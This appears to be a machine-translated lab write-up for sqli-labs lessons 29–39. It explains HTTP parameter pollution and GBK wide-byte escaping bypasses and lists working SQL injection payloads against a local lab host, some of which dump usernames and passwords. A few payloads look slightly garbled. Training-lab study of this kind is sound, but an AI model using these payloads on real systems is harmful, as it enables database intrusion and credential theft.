"20171102 early" sqli-libs less 29-39

Less 29-31 needs to install Tomcat, the old black did not experiment successfully, the principle is index.php?id=1&id=2, the actual incoming system is id=2,id=1 can satisfy the filtering, id=2 actually injected SQL statement. Payload can be attached for your reference

Less29:id=1&id=-2 ' Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+

Less30:id=1&id=-2 "Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+

LESS31:ID=1&ID=-2) Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+

Less 32-38 is the same type of topic, the code to ' transform, into \ ', the solution is to use the wide character will be added to a wide character, the meaning of the wide character is MySQL when using GBK encoding, will consider two characters (AB) as a Chinese character, of course, this a ASCII code is greater than 128 , the evolution process is as follows:

',% \ ' <=>%27-%5c%27, we construct the payload when a%df in front of%5C will make%df%5c a wide character, weakening the role of \, so that injection can be successful.

　　

Less32:192.168.162.135/sqli-libs/less-32/?id=-1%df%27union Select 1,@ @version, 3--+
Less33:192.168.162.135/sqli-libs/less-33/?id=-1%df%27union Select 1,@ @version, 3--+
Less34:uname=admin%df%27union Select 1,database () #&passwd=1&submit=submit
Less35:192.168.162.135/sqli-libs/less-35/?id=-1 Union Select 1,@ @version, 3--+
Less36:192.168.162.135/sqli-libs/less-36/?id=-1%df%27union Select 1,@ @version, 3--+
Less37:uname=admin%df%27union Select 1,database () #&passwd=1&submit=submit
Less38:192.168.162.135/sqli-libs/less-38/?id=-1%df%27union Select 1,@ @version, 3--+
Less39:192.168.162.135/sqli-libs/less-39/?id=-1 Union Select 1,@ @version, 3--+

　　

　　

"20171102 early" sqli-libs less 29-39